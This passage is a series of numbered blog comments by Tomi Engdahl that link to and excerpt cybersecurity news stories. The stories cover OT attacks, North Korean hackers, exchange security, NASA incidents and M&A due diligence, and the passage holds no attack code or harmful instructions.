  39. Tomi Engdahl says:

    OT Systems Increasingly Targeted by Unsophisticated Hackers: Mandiant
    https://www.securityweek.com/ot-systems-increasingly-targeted-unsophisticated-hackers-mandiant

    Unsophisticated threat actors — in many cases motivated by financial gain — have increasingly targeted internet-exposed operational technology (OT) systems, according to research conducted by Mandiant, FireEye’s threat intelligence and incident response unit.

    There are a handful of public reports of attacks on industrial control systems (ICS) causing significant physical damage or disruption. These attacks are typically launched by sophisticated and well-funded threat groups.
  40. Tomi Engdahl says:

    Guidance on Strengthening the Code of Practice on Disinformation https://digital-strategy.ec.europa.eu/en/library/guidance-strengthening-code-practice-disinformation
    The EU Commission publishes its guidance on how the Code of Practice on Disinformation, the first of its kind worldwide, should be strengthened to become a more effective tool for countering disinformation. Full report as PDF:
    https://ec.europa.eu/newsroom/dae/redirection/document/76495
  41. Tomi Engdahl says:

    Are Finnish companies ready for the security requirements of smart devices?
    https://www.epressi.com/tiedotteet/teknologia/ovatko-suomalaiset-yritykset-valmiita-alylaitteiden-tietoturvavaatimuksiin.html
    The security of smart devices is a concern for device manufacturers, device sellers and consumers. In Finland, the voluntary Tietoturvamerkki, a label indicating the security of smart devices, was introduced at the end of 2019.
  42. Tomi Engdahl says:

    ‘World’s Leading Bank Robbers’: North Korea’s Hacker Army
    https://www.securityweek.com/worlds-leading-bank-robbers-north-koreas-hacker-army

    Nuclear-armed North Korea is advancing on the front lines of cyberwarfare, analysts say, stealing billions of dollars and presenting a clearer and more present danger than its banned weapons programmes.

    Pyongyang is under multiple international sanctions over its atomic bomb and ballistic missile programmes, which have seen rapid progress under North Korean leader Kim Jong Un.

    But while the world’s diplomatic focus has been on its nuclear ambitions, the North has been quietly and steadily building up its cyber capabilities, and analysts say its army of thousands of well-trained hackers are proving to be just as dangerous.

    “North Korea’s nuclear and military programmes are long-term threats, but its cyber threats are immediate, realistic threats,” said Oh Il-seok, a researcher at the Institute for National Security Strategy in Seoul.

    Pyongyang’s cyberwarfare abilities first came to global prominence in 2014 when it was accused of hacking into Sony Pictures Entertainment as revenge for “The Interview”, a satirical film that mocked leader Kim.

    The attack resulted in the posting of several unreleased movies online as well as a vast trove of confidential documents.

    Since then the North has been blamed for a number of high-profile cyberattacks, including an $81 million heist from the Bangladesh Central Bank as well as the 2017 WannaCry global ransomware attack, which infected some 300,000 computers in 150 nations.
  43. Tomi Engdahl says:

    US Exchanges Offer a Rich Potential Target for Hackers
    https://www.securityweek.com/us-exchanges-offer-rich-potential-target-hackers

    Cyberattacks have long been seen as a threat to financial markets, but worries are becoming even more acute following a US pipeline hack that set off a public panic and forced the company to pay a ransom.

    Financial exchanges that manage daily transactions of tens or hundreds of billions of dollars are an appealing target for hackers.

    Major stock exchanges insist they are on top of the issue, but remain mum about what steps they are taking to safeguard their networks.

    “Technology and operational resiliency sits at the heart of everything we do,” a Nasdaq spokesperson told AFP.

    Likewise, the Chicago Board Options Exchange “takes cybersecurity very seriously and does not discuss our cyber defenses publicly,” an exchange spokesperson said.
  44. Tomi Engdahl says:

    Inside the surveillance software tracking child porn offenders across the globe
    The Child Protection System helps police triage child pornography cases. But as the system expands, it’s facing growing privacy concerns.
    https://www-nbcnews-com.cdn.ampproject.org/c/s/www.nbcnews.com/news/amp/ncna1234019
  45. Tomi Engdahl says:

    What Cybersecurity Can Learn From Video Games
    https://www.securityweek.com/what-cybersecurity-can-learn-video-games

    The enterprise security world is complex and confusing where we want to believe in the possibility of clean linear solutions for asymmetrical problems. Learning from past history and our current challenges should be enough of a lesson in the failure of security processes and products not delivering in their attempts to make the day-to-day routine of security professional lives easier. Each year we see more vendors with technology solutions and buzzwords that rarely live up to their hype and customers willing to believe or gamble for the chance at more visibility, lower business risk, or the chance to close a security gap.

    What Cybersecurity Can Learn From Video Games (Part II)
    https://www.securityweek.com/what-cybersecurity-can-learn-video-games-part-ii

    By taking some lessons from outside our cybersecurity sandbox, we can address some of the significant challenges in cybersecurity.

    Cybersecurity is hard. There are no easy solutions, and in my previous column, I presented a thesis that we should lift our head out of the metaphorical cybersecurity sandbox to look at other business verticals for opportunities where cybersecurity could bring in principles and solutions with similar problem sets. I focused on interface usability and design principles focused on the human layer of cybersecurity, zeroing in specifically on comparing real-time strategy (RTS) video games to what we do every day in cybersecurity. It might help to check out the list of similarities and differences I created as they’re compelling and an exciting part of the story.
  46. Tomi Engdahl says:

    NASA Identified Over 6,000 Cyber Incidents in Past 4 Years
    https://www.securityweek.com/nasa-identified-over-6000-cyber-incidents-past-4-years

    The U.S. National Aeronautics and Space Administration (NASA) identified more than 6,000 cyber-related incidents in the last four years, according to a report published this month by NASA’s Office of Inspector General.

    NASA has institutional systems, which are used for the day-to-day work of employees — these include data centers, web services, computers and networks. It also has mission systems, which support its aeronautics, space exploration and science programs — these include systems used for controlling spacecraft and processing scientific data.

    The agency has more than 4,400 applications, over 15,000 mobile devices, roughly 13,000 software licenses, nearly 50,000 computers, and a whopping 39,000 Tb of data.

    The audit conducted by NASA’s inspector general has revealed that while attacks on the agency’s networks are not uncommon, “attempts to steal critical information are increasing in both complexity and severity,” and the agency’s ability to detect, prevent and mitigate attacks is limited.
  47. Tomi Engdahl says:

    Why Evaluating Cybersecurity Prior to Mergers and Acquisitions is Necessary
    https://www.securityweek.com/why-evaluating-cybersecurity-prior-mergers-and-acquisitions-necessary

    Timely response and proactive investigation can help lessen the potential negative impact poor cyber hygiene can have on a business acquisition.

    Given the rise in third-party breaches, including successful wide-scale attacks against major technology providers such as SolarWinds and Microsoft, Third Party Risk Management (TPRM) is becoming a critical concern for security teams responsible for the secure integration of third-party systems and infrastructure during mergers and acquisitions.

    Here are 6 focus areas M&A firms should evaluate in their due diligence process:

    1. Security Engineering and Operations Management: Work that requires a dedicated security team is too often managed by IT. Many organizations have only a single IT manager with a small cross-functional team. In the best cases, companies have an accompanying MSSP or MDR vendor, but that still doesn’t guarantee the level of security necessary to mitigate investment risks.

    2. Vulnerability Management: Many organizations still lack an effective vulnerability management capability and seemingly struggle with asset inventory, configuration and release management, and timely patch management. The absence of these fundamental practices creates an expanded attack surface and one that is increasingly leveraged by advanced threat actors and should be viewed with caution. Learning what vulnerabilities exist before you acquire can help you identify the type of investment necessary in bolstering protections should a purchase go through.

    3. Endpoint Security Management: An effective endpoint security management solution must match the sophistication of threats targeting a business. End user systems and devices are a primary access vector utilized by attackers for initial access into corporate networks. Insufficient visibility and security controls at the endpoint can ultimately lead to widespread internal compromise of critical systems and adversary access to sensitive data. Remote and dispersed workforces increase the threat of compromise via endpoint systems and devices.

    4. Network and Data Access Management: Effective network and data access management is a challenge for companies small and large, increasingly so with geographic expansion and today’s remote workforces. Legacy network architectures still plague many organizations. Coupled with the lack of reliable segmentation and consistent access controls restricting access to network shares and repositories, these companies needlessly expose themselves to increased risk. Sensitive data, systems, and infrastructure create an expanded internal attack surface.

    5. Incident Response Management: Organizations often lack incident response management capabilities and struggle with integrating emerging technologies, enhanced monitoring, and the establishment of playbooks and processes. An organization’s maturity and experience with incident response management often serves as a good litmus test for the general security posture and its ability to respond to current and future threats.

    6. Adversary Emulation: Adversary emulation assessments and red teams are great tools for testing security controls and evaluating existing threat detection capabilities. Due to resource constraints, small and medium sized businesses tend to rely on external vendors with inconsistent results. Those same resource constraints translate into undone, incomplete, or sporadic reassessments, which leaves mitigation and remediation findings on the paper they were written on and no further.

    While cyber due diligence has yet to become commonplace in M&A transactions, the consequences of failing to identify risks and active campaigns can have costly implications.

    https://www.securityweek.com/yahoo-slashes-price-verizon-deal-350-million-after-data-breaches